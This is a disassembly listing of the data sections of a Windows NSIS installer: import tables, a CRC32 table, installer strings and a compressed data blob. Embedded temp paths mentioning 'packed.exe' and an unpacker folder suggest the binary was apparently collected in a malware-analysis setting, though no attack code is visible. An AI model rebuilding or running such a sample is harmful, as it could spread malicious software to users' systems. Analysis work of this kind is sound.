aTrcmpia db 'trcmpiA',0
a__0 db '.',0
aClosehandle db 'CloseHandle',0
dw 312h
aSetfiletime db 'SetFileTime',0
db 56h ; V
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
a3 db '3',0
aComparefiletim db 'CompareFileTime',0
dd 655302CEh, 68637261h, 68746150h, 1AD0041h
aGetshortpathna db 'GetShortPathNameA',0
dw 161h
aGetfullpathnam db 'GetFullPathNameA',0
align 2
dw 264h
aMovefilea db 'MoveFileA',0
dw 3ADh
aLstrcata db 'lstrcatA',0
align 2
dw 2FDh
aSetcurrentdire db 'SetCurrentDirectoryA',0
align 2
dw 30Ch
aSetfileattri_1 db 'SetFileAttributesA',0
align 4
db 47h ; G
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0D5h ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
aM db 'M',0
aCreatefilea db 'CreateFileA',0
dw 15Bh
aGetfilesize db 'GetFileSize',0
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aE db 'E',0
aCreatedirect_0 db 'CreateDirectoryA',0
align 2
aP db '',0
aExitprocess db 'ExitProcess',0
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db '=',0
aCopyfilea db 'CopyFileA',0
dd 736C03B9h, 70637274h, 416E79h, 65470108h, 6D6F4374h
dd 646E616Dh, 656E694Ch, 1E90041h
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
dw 1CBh
aGettemppatha db 'GetTempPathA',0
align 2
dw 1DAh
aGetuserdefault db 'GetUserDefaultLangID',0
align 2
dw 145h
aGetdiskfrees_0 db 'GetDiskFreeSpaceA',0
dw 200h
aGlobalunlock db 'GlobalUnlock',0
align 2
dw 1F9h
aGloballock db 'GlobalLock',0
align 4
dd 6C4701EEh, 6C61626Fh, 6F6C6C41h, 690063h, 61657243h
dd 68546574h, 64616572h, 600000h, 61657243h, 72506574h
dd 7365636Fh, 4173h, 654701C9h, 6D655474h, 6C694670h, 6D614E65h
dd 4165h, 736C03B6h, 70637274h, 4179h, 736C03BCh, 656C7274h
dd 416Eh, 65530303h, 646E4574h, 6946664Fh, 656Ch, 6E550363h
dd 5670616Dh, 4F776569h, 6C694666h, 25E0065h, 5670614Dh
dd 4F776569h, 6C694666h, 4E0065h
aCreatefilemapp db 'CreateFileMappingA',0
align 4
db 0B9h ;
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 2B8h
aRemovedirector db 'RemoveDirectoryA',0
align 2
aKernel32_dll_0 db 'KERNEL32.dll',0
align 4
db '',0
aEndpaint db 'EndPaint',0
align 10h
db '',0
aDrawtexta db 'DrawTextA',0
aT db '',0
aFillrect db 'FillRect',0
align 4
db 0FFh
align 2
aGetclientrect db 'GetClientRect',0
db 0Dh,0
aBeginpaint db 'BeginPaint',0
align 2
aO db '',0
aDefwindowproca db 'DefWindowProcA',0
align 4
db 3Bh ; ;
db 2, 53h, 65h
aNdmessagea db 'ndMessageA',0
align 4
db 93h ;
db 1, 49h, 6Eh
aValidaterect db 'validateRect',0
align 2
aB db '',0
aDispatchmessag db 'DispatchMessageA',0
align 2
dw 1FFh
aPeekmessagea db 'PeekMessageA',0
align 2
db '',0
aEnablewindow db 'EnableWindow',0
align 2
dw 10Ch
aGetdc db 'GetDC',0
dw 1BFh
aLoadimagea db 'LoadImageA',0
align 4
db 80h ;
db 2, 53h, 65h
aTwindowlonga db 'tWindowLongA',0
align 2
dw 111h
aGetdlgitem db 'GetDlgItem',0
align 4
db 0ADh ;
db 1, 49h, 73h
aWindow db 'Window',0
align 10h
aF db '',0
aFindwindowexa db 'FindWindowExA',0
db 3Eh ; >
db 2, 53h, 65h
aNdmessagetimeo db 'ndMessageTimeoutA',0
dw 2D6h
aWsprintfa db 'wsprintfA',0
db '-',0
aCharpreva db 'CharPrevA',0
dw 292h
aShowwindow db 'ShowWindow',0
align 4
db 57h ; W
db 2, 53h, 65h
aTforegroundwin db 'tForegroundWindow',0
dw 203h
aPostquitmessag db 'PostQuitMessage',0
dd 65530286h, 6E695774h, 54776F64h, 41747865h, 27A0000h
dd 54746553h, 72656D69h, 990000h, 74736544h, 57796F72h
dd 6F646E69h, 550077h
aCreatedialogpa db 'CreateDialogParamA',0
align 4
aS_0 db '',0
aExitwindowsex db 'ExitWindowsEx',0
db '*',0
aCharnexta db 'CharNextA',0
db 5Ah ; Z
db 1, 47h, 65h
aTsyscolor db 'tSysColor',0
dw 16Eh
aGetwindowlonga db 'GetWindowLongA',0
align 4
db 0B9h ;
db 1, 4Ch, 6Fh
aAdcursora db 'adCursorA',0
dw 24Dh
aSetcursor db 'SetCursor',0
a8 db '8',0
aCheckdlgbutton db 'CheckDlgButton',0
align 10h
db 0F2h ;
align 2
aGetasynckeysta db 'GetAsyncKeyState',0
align 4
db 0A3h ;
db 1, 49h, 73h
aDlgbuttoncheck db 'DlgButtonChecked',0
align 2
dw 231h
aScreentoclient db 'ScreenToClient',0
align 4
dd 6547013Ch, 73654D74h, 65676173h, 736F50h, 6143001Bh
dd 69576C6Ch, 776F646Eh, 636F7250h, 1B10041h, 69577349h
dd 776F646Eh, 69736956h, 656C62h, 6F4C01B7h, 69426461h
dd 70616D74h, 420041h, 736F6C43h, 696C4365h, 616F6270h
dd 6472h, 6553024Ah, 696C4374h, 616F6270h, 61446472h, 6174h
dd 6D4500C1h, 43797470h, 6270696Ch, 6472616Fh, 1F50000h
dd 6E65704Fh, 70696C43h, 72616F62h, 2A40064h, 63617254h
dd 706F506Bh, 654D7075h, 756Eh, 65470174h, 6E695774h, 52776F64h
dd 746365h, 70410008h, 646E6570h, 756E654Dh, 5E0041h, 61657243h
dd 6F506574h, 4D707570h, 756E65h, 6547015Dh, 73795374h
dd 4D6D6574h, 69727465h, 7363h, 6E4500C6h, 61694464h, 676F6Ch
dd 65530247h, 616C4374h, 6F4C7373h, 41676Eh, 734901AEh
dd 646E6957h, 6E45776Fh, 656C6261h, 2830064h, 57746553h
dd 6F646E69h, 736F5077h, 9E0000h, 6C616944h, 6F42676Fh
dd 72615078h, 416D61h, 654700F6h, 616C4374h, 6E497373h
dd 416F66h, 72430060h, 65746165h, 646E6957h, 7845776Fh
dd 2990041h
aSystemparamete db 'SystemParametersInfoA',0
dw 216h
aRegisterclassa db 'RegisterClassA',0
align 4
db 53h ; S
db 2, 53h, 65h
aTdlgitemtexta db 'tDlgItemTextA',0
dw 113h
aGetdlgitemtext db 'GetDlgItemTextA',0
db 0DEh ;
db 1, 4Dh, 65h
aSsageboxa db 'ssageBoxA',0
dw 2D8h
aWvsprintfa db 'wvsprintfA',0
align 4
aUser32_dll db 'USER32.dll',0
align 4
db 0Eh
db 2, 53h, 65h
aLectobject db 'lectObject',0
align 4
db 3Ch ; <
db 2, 53h, 65h
aTtextcolor db 'tTextColor',0
align 4
db 16h
db 2, 53h, 65h
aTbkmode db 'tBkMode',0
db ':',0
aCreatefontindi db 'CreateFontIndirectA',0
db ')',0
aCreatebrushind db 'CreateBrushIndirect',0
aP_0 db '',0
aDeleteobject db 'DeleteObject',0
align 4
db 6Bh ; k
db 1, 47h, 65h
aTdevicecaps db 'tDeviceCaps',0
db 15h
db 2, 53h, 65h
aTbkcolor db 'tBkColor',0
align 2
aGdi32_dll db 'GDI32.dll',0
db 0D0h ;
db 1, 52h, 65h
aGdeletekeya db 'gDeleteKeyA',0
db 0C9h ;
db 1, 52h, 65h
aGclosekey db 'gCloseKey',0
dw 1D5h
aRegenumkeya db 'RegEnumKeyA',0
db 0E2h ;
db 1, 52h, 65h
aGopenkeyexa db 'gOpenKeyExA',0
db 0D9h ;
db 1, 52h, 65h
aGenumvaluea db 'gEnumValueA',0
db 0ECh ;
db 1, 52h, 65h
aGqueryvalueexa db 'gQueryValueExA',0
align 4
db 0F9h ;
db 1, 52h, 65h
aGsetvalueexa db 'gSetValueExA',0
align 2
dw 1CDh
aRegcreatekeyex db 'RegCreateKeyExA',0
db 0D2h ;
db 1, 52h, 65h
aGdeletevaluea db 'gDeleteValueA',0
aAdvapi32_dll_0 db 'ADVAPI32.dll',0
align 4
db '',0
aShfileoperatio db 'SHFileOperationA',0
align 4
db 6
db 1, 53h, 68h
aEllexecutea db 'ellExecuteA',0
db '',0
aShgetpathfromi db 'SHGetPathFromIDListA',0
align 4
aY db 'y',0
aShbrowseforfol db 'SHBrowseForFolderA',0
align 2
db '',0
aShgetmalloc db 'SHGetMalloc',0
db '',0
aShgetspecialfo db 'SHGetSpecialFolderLocation',0
align 2
aShell32_dll db 'SHELL32.dll',0
dw 10h
aCocreateinstan db 'CoCreateInstance',0
align 2
dw 104h
aOleuninitializ db 'OleUninitialize',0
aA db '',0
aOleinitialize db 'OleInitialize',0
aOle32_dll db 'ole32.dll',0
_rdata ends
; Section 3. (virtual address 0000A000)
; Virtual size : 0001C494 ( 115860.)
; Section size in file : 0001C494 ( 115860.)
; Offset to raw data for section: 0000A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 40A000h
off_40A000 dd offset dword_426460 ; DATA XREF: sub_401610:loc_40256D�o
dd offset sub_4013E7
dword_40A008 dd 6 ; DATA XREF: sub_401610+F7�r
; sub_401610+10B�w
dword_40A00C dd 0FFFFFFFFh ; DATA XREF: sub_4033D7+11�r
; sub_403409+8�r ...
dword_40A010 dd 0FFFFFFFFh ; DATA XREF: sub_403420+46�r
; sub_403420+164�r ...
aANsisu__exe db 'A~NSISu_.exe',0 ; DATA XREF: start+304�o
; start:loc_403EB0�w
align 4
dword_40A024 dd 0FFFFFFFFh ; DATA XREF: sub_405597+A4�r
; sub_405597+120�r ...
off_40A028 dd offset sub_40428C ; DATA XREF: sub_405597+3D6�r
dd offset sub_404A94
dd offset sub_40463C
dd offset sub_405202
dd offset sub_404531
dword_40A03C dd 0FFFFFFFFh ; DATA XREF: sub_4049AD+35�w
; sub_4049AD+90�r ...
dword_40A040 dd 6 ; DATA XREF: sub_401610+FC�w
; sub_401610:loc_401716�r ...
aRichedit20a db 'RichEdit20A',0 ; DATA XREF: sub_405A5A+1F2�o
; sub_405A5A+202�w ...
aRiched20_dll db 'RichEd20.dll',0 ; DATA XREF: sub_405A5A+1D3�o
; sub_405A5A+1E0�w
align 10h
dword_40A060 dd 0FFFFFFFFh ; DATA XREF: sub_4060AD+B�r
; sub_4060AD:loc_4060C9�w ...
dd 7 dup(0)
dword_40A080 dd 0 ; DATA XREF: sub_40137E+27�w
; sub_40137E+58�r
dword_40A084 dd 77073096h ; DATA XREF: sub_40137E�r
dd 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh, 0E963A535h
dd 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh, 97D2D988h
dd 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h, 1DB71064h
dd 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh, 6DDDE4EBh
dd 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h, 0FD62F97Ah
dd 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h, 8D080DF5h
dd 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h, 3C03E4D1h
dd 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh, 42B2986Ch
dd 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h, 0DCD60DCFh
dd 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h, 0BFD06116h
dd 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh, 2802B89Eh
dd 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h, 58684C11h
dd 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h, 98D220BCh
dd 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h, 0E8B8D433h
dd 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h, 7F6A0DBBh
dd 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h, 1C6C6162h
dd 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh, 8208F4C1h
dd 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh, 0FCB9887Ch
dd 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h, 4DB26158h
dd 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h, 3DD895D7h
dd 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh, 0AD678846h
dd 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh, 0DD0D7CC9h
dd 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h, 5768B525h
dd 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh, 29D9C998h
dd 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h, 0B7BD5C3Bh
dd 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch, 74B1D29Ah
dd 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h, 0E3630B12h
dd 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh, 9309FF9Dh
dd 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h, 1E01F268h
dd 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h, 6E6B06E7h
dd 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh, 0F9B9DF6Fh
dd 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h, 0A1D1937Eh
dd 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h, 3FB506DDh
dd 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h, 41047A60h
dd 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h, 0CB61B38Ch
dd 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h, 0BB0B4703h
dd 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h, 2BB45A92h
dd 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh, 5BDEAE1Dh
dd 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah, 9C0906A9h
dd 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h, 0E2B87A14h
dd 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh, 7CDCEFB7h
dd 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h, 1FDA836Eh
dd 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h, 88085AE6h
dd 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh, 0F862AE69h
dd 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh, 4E048354h
dd 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh, 3E6E77DBh
dd 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h, 0A9BCAE53h
dd 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch, 0CABAC28Ah
dd 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h, 54DE5729h
dd 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h, 2A6F2B94h
dd 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_40A480 dd 0 ; DATA XREF: sub_401610+982�r
; sub_401610+9BC�r ...
align 8
dword_40A488 dd 100h dup(0) ; DATA XREF: sub_401508+1D�o
; sub_401610+523�o ...
byte_40A888 db 0 ; DATA XREF: sub_4014E1�o
; sub_401610+2E6�o ...
align 4
dd 0FFh dup(0)
dword_40AC88 dd 0 ; DATA XREF: sub_401610+556�o
; sub_401610+11B8�o ...
dd 2FFh dup(0)
word_40B888 dw 0 ; DATA XREF: sub_401610+1122�o
; sub_401610+112D�w
align 4
dd 1FFh dup(0)
dword_40C088 dd 0 ; DATA XREF: sub_401610+BDC�w
; sub_401610+C1F�o
dd 3 dup(0)
dword_40C098 dd 0 ; DATA XREF: sub_401610+BE9�w
byte_40C09C db 0 ; DATA XREF: sub_401610+BF6�w
byte_40C09D db 0 ; DATA XREF: sub_401610+C08�w
byte_40C09E db 0 ; DATA XREF: sub_401610+C0E�w
byte_40C09F db 0 ; DATA XREF: sub_401610+C13�w
dd 0
dword_40C0A4 dd 8 dup(0) ; DATA XREF: sub_401610+C03�o
dword_40C0C4 dd 0 ; DATA XREF: sub_4014F2�r
; sub_401508:loc_401510�r ...
dword_40C0C8 dd 10h dup(0) ; DATA XREF: .text:00403385�o
dword_40C108 dd 2, 0DEADBEEFh, 6C6C754Eh, 74666F73h, 74736E49h, 0CCAh
; DATA XREF: sub_403756+99�o
; sub_403756+B5�o ...
dd 40E64h, 5Dh, 2650001h, 82C317FCh, 1C46A161h, 0A6546B1Fh
dd 9D80A0D0h, 3EC8EBE6h, 0AC2EAFFCh, 0B077B183h, 6B213B5Ah
dd 0EC0931A7h, 0A6C94F95h, 8F1F11C5h, 92481EC1h, 4B778C1Ah
dd 45048998h, 1F1A4D9Fh, 7EA97BDFh, 31CE23FFh, 0C75C5245h
dd 0C2F36865h, 0BB2A1649h, 0E7390FEBh, 0D48DE2C4h, 5F97FF78h
dd 8F7DAD9Eh, 0E06AC1FEh, 5FC52627h, 0CBA4E7Bh, 1BDD0119h
dd 0B67173EAh, 0C28661E7h, 0E4AFE652h, 0D438EDE7h, 0F0F3FF50h
dd 4298412Ah, 6B929D70h, 5991DD29h, 0A48D9077h, 0CED324BEh
dd 822F12CEh, 0AE159E0Fh, 300E1C8Dh, 0A1ECC4BAh, 8268192Ah
dd 64B1B594h, 808AC0C8h, 0C471E9BCh, 0B8BACDDh, 4CD6F280h
dd 0A36330D1h, 0A67BE548h, 0E7E4C983h, 0B53C11F2h, 10FA75DDh
dd 0F8985400h, 1F2E4C7h, 0A8D3D615h, 51DF830Bh, 6B19310Fh
dd 0B760434Dh, 818721A6h, 0AE7E0C39h, 0F6916AFFh, 5AA9FBF6h
dd 0B43CD6AEh, 0E1A53299h, 51ACD54Bh, 7CB16DB2h, 0A124BE97h
dd 0A22D74B4h, 7322798Bh, 0F10340B8h, 0A4A25C4Ch, 0A5743B29h
dd 9FF49A43h, 18218076h, 0EBDCC568h, 0C69A91F0h, 295963C9h
dd 48877F2Bh, 0AD0A575Ch, 11362557h, 483A89B2h, 0EA3D08A0h
dd 7D427794h, 60BE0DC8h, 88B9EFE5h, 4609D9A5h, 51755D6Dh
dd 1F15CAAAh, 4248B7B2h, 0C1C60B93h, 47F1D1C2h, 0D1D01406h
dd 2B4E1925h, 3A2323CAh, 79BFCA69h, 59BAA05Ah, 0CCB274F3h
dd 0B3652Eh, 3A88274Ch, 63215038h, 0FEC581D1h, 143AF5D8h
dd 0D97AC534h, 0B236054Ah, 0F8398F42h, 3FAD5B45h, 0A934463Ch
dd 4510CDECh, 8DABC154h, 0CB1E178Fh, 0B9B5F08Eh, 0CB582EEEh
dd 7D7346A6h, 0B7B0B84Fh, 4C66E243h, 0F57298B3h, 230DF82Dh
dd 19E6F969h, 1F80h dup(0)
dword_414108 dd 6 dup(0) ; DATA XREF: sub_403420:loc_403546�o
; sub_403756+1DE�o
dword_414120 dd 0 ; DATA XREF: sub_403420+8E�w
dword_414124 dd 0 ; DATA XREF: sub_403420+94�w
; sub_403420+188�r ...
dword_414128 dd 0 ; DATA XREF: sub_403420+12B�w
; sub_403420+14D�r
dword_41412C dd 0 ; DATA XREF: sub_403420+135�w
dd 18h dup(0)
dword_414190 dd 2000h dup(0) ; DATA XREF: sub_403420+12B�o
; sub_403420+153�o
dword_41C190 dd 9200h ; DATA XREF: .text:00403359�r
; sub_403420+58�w ...
dword_41C194 dd 0 ; DATA XREF: .text:0040334E�w
; .text:0040337E�r
dword_41C198 dd 45268h ; DATA XREF: .text:0040335F�r
; sub_403420+52�w ...
align 10h
dword_41C1A0 dd 1000h dup(0) ; DATA XREF: sub_403420+75�o
; sub_40362B+8E�o
dword_4201A0 dd 0 ; DATA XREF: sub_403420+13�r
; sub_403420+B9�r ...
dword_4201A4 dd 0 ; DATA XREF: sub_403420:loc_40347E�r
; sub_403756+28A�w
dword_4201A8 dd 0 ; DATA XREF: sub_403420+33�r
; sub_403420+63�r ...
dword_4201AC dd 0 ; DATA XREF: sub_403420+19�r
; sub_403420+40�r ...
dword_4201B0 dd 0 ; DATA XREF: sub_401610+476�r
; sub_401610+490�r ...
align 8
byte_4201B8 db 0 ; DATA XREF: start+2E8�o start+2F8�w
byte_4201B9 db 3 dup(0) ; DATA XREF: start+2E3�o
dd 1FCh dup(0)
db 0
dword_4209AD dd 0 ; DATA XREF: start+336�r
align 8
dword_4209B8 dd 100h dup(0) ; DATA XREF: start+2ED�o
dword_420DB8 dd 0 ; DATA XREF: sub_404258+9�r
; sub_404258+26�w ...
dword_420DBC dd 0 ; DATA XREF: sub_405597+196�w
; sub_405597+1E5�w ...
dword_420DC0 dd 0 ; DATA XREF: sub_4049AD+D5�r
; sub_404A94+A3�w
dword_420DC4 dd 0 ; DATA XREF: sub_40463C:loc_4047DD�w
; sub_40463C+2FD�r ...
dword_420DC8 dd 100h dup(0) ; DATA XREF: sub_40463C+1EB�o
dword_4211C8 dd 0 ; DATA XREF: sub_403FD6+7�r
; sub_405597+B0�r ...
dword_4211CC dd 0 ; DATA XREF: sub_404A94+B6�w
; sub_404A94+C2�r ...
dword_4211D0 dd 0 ; DATA XREF: sub_404A94+7E�w
; sub_404A94:loc_404C94�r ...
dword_4211D4 dd 0 ; DATA XREF: sub_40410B+AC�r
; sub_405597+36�r ...
byte_4211D8 db 0 ; DATA XREF: sub_40509F+28�o
; sub_40509F+CA�w
align 4
dd 1FFh dup(0)
dword_4219D8 dd 400h dup(0) ; DATA XREF: sub_404578+62�o
; sub_40463C+131�o ...
dword_4229D8 dd 0 ; DATA XREF: sub_403FD6+E�r
; sub_403FFA+4�r ...
dword_4229DC dd 0 ; DATA XREF: sub_40428C+152�r
; sub_40463C+6�r ...
dword_4229E0 dd 0 ; DATA XREF: sub_405202+22A�w
; sub_405597+141�w ...
dword_4229E4 dd 0 ; DATA XREF: sub_40428C+112�w
; sub_40428C+146�r ...
dword_4229E8 dd 0 ; DATA XREF: sub_401610:loc_40319B�r
; sub_405597:loc_405A29�r ...
align 10h
dword_4229F0 dd 100h dup(0) ; DATA XREF: sub_406357+B7�o
; sub_406357+171�o ...
dword_422DF0 dd 100h dup(0) ; DATA XREF: sub_406357+92�o
dword_4231F0 dd 0 ; DATA XREF: sub_405D01+9�w
; sub_405D01+2B�o
dd 11h dup(0)
dword_423238 dd 100h dup(0) ; DATA XREF: sub_40622D+5�o
dword_423638 dd 0 ; DATA XREF: sub_406357+43�w
; sub_406357+66�o ...
dd 0FFh dup(0)
dword_423A38 dd 50h dup(0) ; DATA XREF: sub_406168+10�o
dword_423B78 dd 100h dup(0) ; DATA XREF: sub_4067E6+52�o
dword_423F78 dd 0 ; DATA XREF: sub_401610+1A66�w
; sub_40463C+51�w ...
align 10h
dword_423F80 dd 400h dup(0) ; DATA XREF: sub_4060AD+73�o
; sub_40614C+9�o
byte_424F80 db 0 ; DATA XREF: sub_40428C+1D7�o
; sub_40463C+183�o ...
byte_424F81 db 3 dup(0) ; DATA XREF: sub_405A5A+66�o
dd 1FFh dup(0)
byte_425780 db 0 ; DATA XREF: sub_4040E9+A�o
; sub_4060AD+2D�r ...
align 4
dd 0FFh dup(0)
dword_425B80 dd 0 ; DATA XREF: sub_405A5A+108�o
dword_425B84 dd 0 ; DATA XREF: sub_405A5A+12B�w
align 10h
dword_425B90 dd 0 ; DATA XREF: sub_405A5A+135�w
dword_425B94 dd 0 ; DATA XREF: sub_405A5A+119�w
dd 3 dup(0)
dword_425BA4 dd 0 ; DATA XREF: sub_405A5A+13B�w
; sub_405A5A+20B�w
dword_425BA8 dd 0 ; DATA XREF: sub_404024�r
; sub_404578+85�r ...
dword_425BAC dd 0 ; DATA XREF: sub_401610:loc_4017E9�r
; sub_40509F+6�r ...
dword_425BB0 dd 0 ; DATA XREF: sub_405597+1C7�r
; sub_405A5A+FF�w
dword_425BB4 dd 0 ; DATA XREF: sub_401610:loc_4016A9�w
; sub_403F8D+7�w ...
dword_425BB8 dd 0 ; DATA XREF: sub_40509F+68�r
; sub_405202+78�w
dword_425BBC dd 0 ; DATA XREF: sub_40410B+62�w
; sub_405597+3E0�r ...
dword_425BC0 dd 0 ; DATA XREF: sub_401610:loc_4017D3�r
; sub_405202+69�w ...
dword_425BC4 dd 0 ; DATA XREF: sub_4013E7+93�r
; sub_405202+A1�w
dword_425BC8 dd 0 ; DATA XREF: sub_40410B+74�w
; sub_40410B:loc_404185�r ...
dword_425BCC dd 0 ; DATA XREF: sub_4013E7+98�w
; sub_4013E7+AF�r ...
dd 4 dup(0)
aNsisError db 'NSIS Error',0 ; DATA XREF: sub_401000+150�o start+29�o ...
align 4
dd 1FDh dup(0)
dword_4263E0 dd 0 ; DATA XREF: sub_401000+19�r
; sub_401610+9�r ...
dword_4263E4 dd 400000h ; DATA XREF: sub_403420+116�r
; sub_403756+22�r ...
dword_4263E8 dd 0 ; DATA XREF: sub_401000+39�r
; sub_4012F3+6�r ...
dd 5 dup(0)
dword_426400 dd 0 ; DATA XREF: sub_403756+2F9�o
; sub_405597+1F5�r
dword_426404 dd 0 ; DATA XREF: sub_405597+9E�r
; sub_405597+25E�r ...
dword_426408 dd 0 ; DATA XREF: sub_40117D+4�r
; sub_4011EF+13�r ...
dword_42640C dd 0 ; DATA XREF: sub_40117D+21�r
; sub_40117D+64�r ...
dword_426410 dd 0 ; DATA XREF: sub_4013E7:loc_401400�r
align 8
dword_426418 dd 0 ; DATA XREF: sub_40428C:loc_4042BD�r
; sub_405A5A+3B�r ...
align 10h
dword_426420 dd 0 ; DATA XREF: sub_40410B+41�r
dword_426424 dd 0 ; DATA XREF: sub_40410B:loc_404132�r
dword_426428 dd 0 ; DATA XREF: sub_401610:loc_402149�r
dd 3 dup(0)
dword_426438 dd 0 ; DATA XREF: sub_40362B+10�r
align 10h
dword_426440 dd 0 ; DATA XREF: sub_403756+2D7�w
; start+1FE�r ...
dword_426444 dd 0 ; DATA XREF: sub_4013E7+31�r
; sub_4013E7+57�r ...
dword_426448 dd 0 ; DATA XREF: sub_401610+18A2�r
; sub_403756:loc_4037D3�r ...
dword_42644C dd 0 ; DATA XREF: sub_404A94+59�w
; sub_404A94+465�w
dd 4 dup(0)
dword_426460 dd 0 ; DATA XREF: sub_401610+18B�w
; sub_401610:loc_4017C6�r ...
dword_426464 dd 0 ; DATA XREF: sub_4015C7:loc_4015DC�r
; sub_401610+1369�r ...
dword_426468 dd 0 ; DATA XREF: sub_401610+651�w
; sub_401610+677�w ...
dword_42646C dd 0 ; DATA XREF: sub_403FD6�r
; sub_405177:loc_4051E2�w ...
dword_426470 dd 0 ; DATA XREF: sub_406357:loc_4065A7�w
dword_426474 dd 0 ; DATA XREF: sub_401610:loc_402835�w
; start:loc_403ECA�r
align 10h
dword_426480 dd 0 ; DATA XREF: sub_403420+A6�r
; sub_403756+2BF�w ...
dword_426484 dd 0 ; DATA XREF: sub_40463C+2CE�w
dword_426488 dd 0 ; DATA XREF: sub_40410B+6B�w
; sub_405D79:loc_405D93�r
dword_42648C dd 0 ; DATA XREF: start:loc_403D8D�w
; start:loc_403F74�r
dword_426490 dd 0 ; DATA XREF: sub_401610+EA1�r start+2E�w ...
_data ends
; Section 4. (virtual address 00027000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00027000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_ndata segment para public 'BSS' use32
assume cs:_ndata
;org 427000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_427000 dd 0 ; DATA XREF: sub_4013E7+67�o
; sub_401610+46�o ...
dd 13FFh dup(0)
byte_42C000 db 70h ; DATA XREF: sub_403A62+28�o
; start:loc_403B62�o ...
byte_42C001 db 61h, 63h, 6Bh ; DATA XREF: start+B0�o
db 65h ; e
db 64h, 2Eh, 65h
db 78h ; x
db 65h, 0, 5Ch
aSriUserLocals1 db 'SRI-user\LOCALS~1\Temp\nst1.tmp',0
dd 0F5h dup(0)
byte_42C400 db 0 ; DATA XREF: sub_401610:loc_402E7F�o
; start+24B�o ...
align 4
dd 0FFh dup(0)
dword_42C800 dd 100h dup(0) ; DATA XREF: sub_401610+271�o
; sub_401610:loc_401B43�o ...
dword_42CC00 dd 6D5C3A43h, 706E755Fh, 656B6361h, 61700072h, 64656B63h
; DATA XREF: sub_403756+1C�o
dd 6578652Eh, 0FAh dup(0)
byte_42D000 db 0 ; DATA XREF: sub_40410B�r
; sub_40410B+10�o
align 4
dd 0FFh dup(0)
aCDocume1SriUse db 'C:\DOCUME~1\SRI-user\LOCALS~1\Temp\',0 ; DATA XREF: sub_403756+1F0�o
; sub_403A62+1�o ...
dd 0F7h dup(0)
dword_42D800 dd 200h dup(0) ; DATA XREF: sub_403A96+31�o
dword_42E000 dd 400h dup(0) ; DATA XREF: sub_405597+291�o
_ndata ends
; Section 6. (virtual address 00030000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
